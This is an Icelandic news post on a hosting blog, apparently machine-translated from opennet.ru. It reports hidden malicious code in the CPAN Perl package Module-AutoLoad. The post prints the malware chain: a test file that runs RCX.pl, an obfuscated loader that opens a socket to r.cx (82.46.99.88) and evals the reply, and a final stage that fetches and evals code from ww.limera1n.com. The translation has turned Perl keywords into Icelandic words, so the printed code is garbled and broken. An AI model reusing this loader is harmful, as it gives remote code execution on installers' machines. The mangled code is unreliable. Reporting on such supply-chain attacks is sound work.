ProHoster > Blog > netfréttir > Illgjarn kóði fannst í Module-AutoLoad Perl pakkanum

Illgjarn kóði fannst í Module-AutoLoad Perl pakkanum

Í Perl pakka dreift í gegnum CPAN skrána Module-AutoLoad, hannað til að hlaða CPAN einingar sjálfkrafa á flugu, auðkennd illgjarn kóða. Illgjarn innskot var Fundið í prófunarkóðanum 05_rcx.t, sem hefur verið send frá árinu 2011.
Það er athyglisvert að spurningar um hleðslu á vafasömum kóða vöknuðu á Stackoverflow aftur árið 2016.

Illgjarn athæfi snýst um tilraun til að hlaða niður og keyra kóða frá þriðja aðila netþjóni (http://r.cx:1/) meðan á keyrslu prófunarsvítu var keyrt þegar einingin var sett upp. Gert er ráð fyrir að kóðinn sem upphaflega var hlaðið niður af ytri netþjóninum hafi ekki verið illgjarn, en nú er beiðninni vísað á ww.limera1n.com lénið, sem útvegar sinn hluta kóðans til framkvæmdar.

Til að skipuleggja niðurhalið í skrá 05_rcx.t Eftirfarandi kóði er notaður:

$prog mitt = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
$reyna mín = `$^X $prog`;

Tilgreindur kóði veldur því að handritið er keyrt ../contrib/RCX.pl, þar sem innihald er minnkað í línuna:

notaðu lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Þetta handrit hleðst inn ruglaður að nota þjónustuna perlobfuscator.com kóða frá ytri hýsil r.cx (stafakóðar 82.46.99.88 samsvara textanum "R.cX") og keyrir hann í eval blokkinni.

$ perl -MIO::Socket -e'$b=nýtt IO::Socket::INET 82.46.99.88.":1″; prenta <$b>;'
eval pakkaðu upp u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Eftir að hafa verið pakkað upp er eftirfarandi að lokum framkvæmt: kóða:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Vandræðapakkinn hefur nú verið fjarlægður úr geymslunni. BROT (Perl Authors Upload Server), og reikningur höfundar einingarinnar er lokaður. Í þessu tilviki er einingin enn eftir laus í MetaCPAN skjalasafninu og hægt er að setja það upp beint frá MetaCPAN með því að nota sum tól eins og cpanminus. Það er tekið framað pakkinn dreifðist ekki mikið.

Áhugavert að ræða tengdur og höfundur einingarinnar, sem neitaði upplýsingum um að illgjarn kóða væri settur inn eftir að staður hans “r.cx” var hakkaður og útskýrði að hann væri bara að skemmta sér og notaði perlobfuscator.com ekki til að fela eitthvað, heldur til að minnka stærðina kóðans og einfalda afritun hans í gegnum klemmuspjaldið. Valið á fallheitinu „botstrap“ skýrist af þeirri staðreynd að þetta orð „hljómar eins og láni og er styttra en ræsiband. Höfundur einingarinnar fullvissaði einnig um að auðkenndar meðhöndlun framkvæmi ekki illgjarnar aðgerðir, heldur sýnir aðeins hleðslu og framkvæmd kóða í gegnum TCP.

Heimild: opennet.ru

Bæta við athugasemd